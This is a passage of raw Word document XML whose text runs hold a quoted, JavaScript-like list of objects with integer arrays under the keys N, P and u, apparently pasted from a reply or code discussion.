      </w:r>
    </w:p>
    <w:p w14:paraId="7018E809" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068AA5D2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10082935" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24218769" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3554809E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D6ED17" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21524DF8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D85E8ED" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 12, 159, 239, 264, 292, 332]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4545B107" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA526CC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE1E00" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7561C12F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 4, 6, 10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423D2A73" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9259B7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C889672" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0092DE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [13]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640F2770" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3468D6E5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3508D58D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF54B34" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1352E096" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7E9409" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C020A4B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65519DCF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072001BE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EF8CF1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFEFF3A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A920959" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7D546E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261CC32C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38784634" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7929FCD9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 14]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD6075E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE588C6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BCF5CA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032E0268" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [122, 275]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171EEFDA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E44E26" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0996CB05" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F72FAB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEC9D72" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3960EEAA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B0B7D6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548982E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6FC2EB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C957388" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7E1128" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6502F9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2FE352" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3130AAF7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331B880B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423EDE52" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E3BED8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 6, 7, 8, 9, 10, 17, 20]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1D09C9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410D2908" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EBE203" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644A5937" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134D81CD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7961C1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA7D925" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5842247A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7E3375" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1089193A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76997426" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7809CAD7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB78FD2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F152C8D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5AFF14" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF884A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 15],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C059ABD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [14, 16, 23, 35, 40, 62, 149, 218, 238, 322, 333, 353]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0E149C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D39773F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A065CE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646E7955" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D31A87D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7519B1DA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C8EE81" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3872C3E0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [11, 17]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D12957" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642BB496" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBBD15B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5B7B5A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23983018" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2079E110" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBBDC34" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FBBC57" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F751C69" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACFDAF0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030EE728" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4, 5, 6, 7, 10, 11, 13, 14],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC6A552" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 8, 9, 12, 15, 21, 22, 23, 28, 159, 245, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C1390B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B64E50" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E71B85" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18178999" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 12]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A06629C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4201E512" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBDBAAE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AF8891" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3316F6F9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130D6F33" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056FA89C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A41B2D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB35128" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433D5422" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D165B5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5637A3EC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F988667" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0968E5F4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184A6E87" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7EDCF3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 11, 14, 234, 305]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEF410C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489F636B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B5D5AA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD2B3C6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4784AD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB9C134" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5035D882" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBFCD5E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 8, 13, 19, 159]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25365655" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309AC3C9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C55C5BE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418FEE0E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [230, 233, 305]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AC555E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7353DF85" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B2F27D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330DAB4F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E71BFF4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDDCDB4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442958F8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0146EF20" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
